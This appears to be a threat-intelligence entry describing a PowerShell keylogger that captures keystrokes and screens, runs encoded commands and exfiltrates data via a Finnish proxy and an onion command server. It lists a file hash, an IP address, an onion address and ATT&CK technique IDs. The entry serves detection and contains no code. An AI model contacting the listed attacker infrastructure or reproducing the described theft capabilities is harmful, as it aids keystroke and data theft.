PowerShell Keylogger
Sept. 4, 2024, 9:45 a.m.
Tags
External References
Description
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It implements various functions including screen capture, encoded command execution, and persistent connection attempts. The keylogger's code suggests a French-speaking developer. While sophisticated in its approach, the persistence mechanism remains incomplete, indicating potential future enhancements. The analysis highlights the need for robust security measures against such stealthy threats.
Date
Published: Sept. 4, 2024, 9:05 a.m.
Created: Sept. 4, 2024, 9:05 a.m.
Modified: Sept. 4, 2024, 9:45 a.m.
Indicators
181fe99c16fa6cc87a3161bc08a9e2dbd17531c7d713b09d8567c1b3debe121f
37.143.129.165
opioem3zmp3bgx3qjqkh6vimkdoerrwh3uhawklm5ndv5e7k3t4edbqd.onion
Attack Patterns
T1059.001
T1571
T1082
T1083
T1059
Additional Informations
Finland